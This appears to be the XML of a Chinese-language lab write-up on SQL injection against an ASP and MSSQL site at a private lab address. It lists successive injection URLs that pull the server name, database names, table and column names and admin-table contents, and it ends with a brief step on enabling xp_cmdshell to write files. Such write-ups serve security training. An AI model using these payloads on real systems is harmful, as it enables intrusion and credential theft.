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6532C2" w14:textId="00374041" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ASP</w:t>
      </w:r>
      <w:r>
        <w:t>+Mssql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8AAF1" w14:textId="0B7DDFAC" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003878E1">
        <w:t>http://172.16.1.121/otype.asp?classid=5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E16F24B" w14:textId="3718170C" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4719A83C" wp14:editId="4CC4DB26">
            <wp:extent cx="5274310" cy="33280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03D2" w14:textId="6207C662" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003878E1">
        <w:t>http://172.16.1.121/otype.asp?classid=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8710F" w14:textId="79BFA40A" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D25E981" wp14:editId="427BDA4C">
            <wp:extent cx="3933333" cy="160000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12A3" w14:textId="09B120F7" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00B22A42">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.121/search.asp?key=123%27+UNION+ALL+SELECT+null,%27kkkkkkk%27,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="16A01E2C" w14:textId="51263D02" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42FF6658" w14:textId="5B061808" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D4D17C" w14:textId="66754F12" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D675B40" w14:textId="1DB87A31" w:rsidR="00ED055C" w:rsidRPr="003878E1" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53DA0F94" w14:textId="493474E1" w:rsidR="003878E1" w:rsidRDefault="003878E1" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="401F50C1" wp14:editId="539AEE95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B5B9" w14:textId="11E507E6" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6CC76B" w14:textId="5A2B0493" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5B57CA" w14:textId="2E43B8CD" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="771550D5" w14:textId="07CAFCB5" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114D7304" w14:textId="634209F6" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77851454" w14:textId="4164ACCB" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆计算机名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45C050" w14:textId="6943E376" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED055C">
        <w:t>http://172.16.1.121/search.asp?key=123%27%20and%20@@SERVERNAME%3E0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448DE448" w14:textId="027B3251" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24CE6DC9" wp14:editId="0BC024CF">
            <wp:extent cx="5274310" cy="20370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11D6" w14:textId="76FD9D0F" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00B22A42">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.121/search.asp?key=123%27%20and%20db_name()%3E0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61422736" w14:textId="66BD2EF4" w:rsidR="00ED055C" w:rsidRPr="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215BDD05" w14:textId="02BF25A7" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="636AC1E5" wp14:editId="40366987">
            <wp:extent cx="5274310" cy="20802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376E" w14:textId="6000E91D" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆当前用户权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFBF772" w14:textId="34118743" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED055C">
        <w:t>http://172.16.1.121/search.asp?key=123%27%20and%20User_Name()%3E0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372CD60B" w14:textId="4E1C4062" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CDEC805" w14:textId="1F7ED601" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CA1EBEA" wp14:editId="01E5EADA">
            <wp:extent cx="5274310" cy="2066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B4D6" w14:textId="15FA2D19" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39A0E21D" w14:textId="2D6C9368" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00B22A42">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>http://172.16.1.121/search.asp?key=123%27%20and%20(SELECT%20top%201%20Name%20FROM%20Master..SysDatabases)%3E0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CAED5AA" w14:textId="395FBE92" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291EACF3" w14:textId="66AB9526" w:rsidR="00ED055C" w:rsidRPr="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆其他数据库名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41378FD8" w14:textId="5F85D2EE" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E38A6F" wp14:editId="164CA8F3">
            <wp:extent cx="5274310" cy="2009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E587" w14:textId="707AC96A" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="318DDA00" w14:textId="29F0FA75" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CC526C9" w14:textId="52069AFF" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>爆表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62751A60" w14:textId="4181CABD" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03FB4D85" w14:textId="0D358576" w:rsidR="00ED055C" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0033435E">
        <w:t>172.16.1.121/search.asp?key=123' and (select top 1 name from [aa].sys.all_objects where type='U' AND is_ms_shipped=0)&gt;0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
      <w:r w:rsidR="00ED055C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C4605D6" wp14:editId="0CFD6790">
            <wp:extent cx="5274310" cy="20389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1061" w14:textId="31890CE0" w:rsidR="00ED055C" w:rsidRDefault="00ED055C" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BFCB2F" w14:textId="65E2B3CC" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45187E56" w14:textId="57B3924A" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F00140D" w14:textId="594DBF7B" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="636BD71A" wp14:editId="3F0C32D3">
            <wp:extent cx="5274310" cy="21647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B3B1" w14:textId="2885F452" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="139C3A05" w14:textId="2F8A3089" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0033435E">
        <w:t>http://172.16.1.121/search.asp</w:t>
      </w:r>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="0033435E">
        <w:t>search.asp?key=123'%20 and (select top 1 name from aa.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('book_setup','Download'))&gt;0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CAA637C" wp14:editId="129FF99C">
            <wp:extent cx="5274310" cy="18078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2A31" w14:textId="51499150" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E58790A" w14:textId="73283957" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692CAE19" w14:textId="721FD9B5" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61EB8326" w14:textId="2B6B080B" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过逐步查询除所有的表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44205CBF" w14:textId="3C93C357" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0033435E">
        <w:t>http://172.16.1.121/search.asp?key=123'%20 and (select top 1 name from aa.sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('book_setup','Download','Feedback','gonggao','News','shop_pinglun','SmallClass','SmallClass_down','sogo_link','WebBasicInfo','Admin','bigClass'))&gt;0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6374C29F" w14:textId="0BB9C7EF" w:rsidR="0033435E" w:rsidRDefault="0033435E" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D56FD9A" wp14:editId="198580C6">
            <wp:extent cx="5274310" cy="23825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E1CE" w14:textId="17972747" w:rsidR="0033435E" w:rsidRDefault="00B923C8" w:rsidP="00B923C8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6675"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCA80B3" w14:textId="1FB80575" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="00B923C8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6675"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71B61658" w14:textId="71841AB0" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="00B923C8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6675"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7400C15A" w14:textId="27FFC0D2" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="00B923C8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6675"/>
        </w:tabs>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆字段名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1994EDCA" w14:textId="11170426" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="00B923C8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6675"/>
        </w:tabs>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923C8">
        <w:t>2.16.1.121/search.asp?key=123'and (select top 1 COLUMN_NAME from aa.information_schema.columns where TABLE_NAME='admin'%20 and COLUMN_NAME not in('ID','admin','password')) &gt;0--+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B905704" w14:textId="3B06DBD4" w:rsidR="0033435E" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CEB27EC" wp14:editId="71752C3B">
            <wp:extent cx="5274310" cy="19627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2C6F" w14:textId="66B15EB0" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D8A60E7" w14:textId="00B44507" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC8DF7B" w14:textId="42D83BBF" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C78EE5E" w14:textId="5B186293" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00B923C8">
        <w:t>72.16.1.121/search.asp?key=123'and (select top 1 admin from admin)&gt;0 --+-Tbeu&amp;otype=title&amp;submit2=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A23B32" w14:textId="518A83DB" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54D2201F" wp14:editId="286D0BA5">
            <wp:extent cx="5274310" cy="19907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5C53" w14:textId="1525A3A6" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6003C310" w14:textId="1E84F4BC" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B4F6CE" w14:textId="7336235F" w:rsidR="00B923C8" w:rsidRDefault="00B923C8" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="383455AE" wp14:editId="1FEB2F89">
            <wp:extent cx="5274310" cy="18084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F715" w14:textId="09CEDF56" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="605A9FB6" w14:textId="0FADEF2C" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EBD2D99" w14:textId="5A8B0C6A" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23682370" w14:textId="6D244CDC" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A59793" w14:textId="7FB49B6B" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EBB60D7" w14:textId="057EF372" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="724E1FFF" w14:textId="3A2E73B2" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23194976" w14:textId="7F7893C3" w:rsidR="00A437A2" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Xp_cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell写入，先开启x</w:t>
      </w:r>
      <w:r>
        <w:t>p_cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9A390" w14:textId="77777777" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="284F4E11" w14:textId="78778B5B" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3473851D" w14:textId="4EC68120" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30548F6E" w14:textId="148758B7" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Ok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B51662" w14:textId="77777777" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDF6664" w14:textId="1D2A1154" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78056DE8" wp14:editId="15159811">
            <wp:extent cx="5274310" cy="17329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9350" w14:textId="376AA78C" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11AA70CA" w14:textId="52B5C16F" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21CAA72D" w14:textId="41266408" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1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8D86B15" wp14:editId="2190FF37">
            <wp:extent cx="4057143" cy="1466667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0E17" w14:textId="77777777" w:rsidR="00A437A2" w:rsidRDefault="00A437A2" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28BB47BF" w14:textId="0AF16D44" w:rsidR="00B923C8" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BD369E" w14:textId="77777777" w:rsidR="001F4799" w:rsidRDefault="001F4799" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0045707B" w14:textId="27631F87" w:rsidR="00B923C8" w:rsidRDefault="00627EB9" w:rsidP="003878E1">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考文档：</w:t>
      </w:r>
      <w:r w:rsidR="00BD76B3" w:rsidRPr="00BD76B3">
        <w:t>https://blog.csdn.net/niexinming/article/details/49055609</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B923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B22"/>
    <w:rsid w:val="001F4799"/>
    <w:rsid w:val="0033435E"/>
    <w:rsid w:val="003878E1"/>
    <w:rsid w:val="004E762C"/>
    <w:rsid w:val="00527A7A"/>
    <w:rsid w:val="00627EB9"/>
    <w:rsid w:val="006A7EAA"/>
    <w:rsid w:val="007C2B22"/>
    <w:rsid w:val="009C146E"/>
    <w:rsid w:val="00A437A2"/>
    <w:rsid w:val="00AE49B3"/>
    <w:rsid w:val="00B923C8"/>
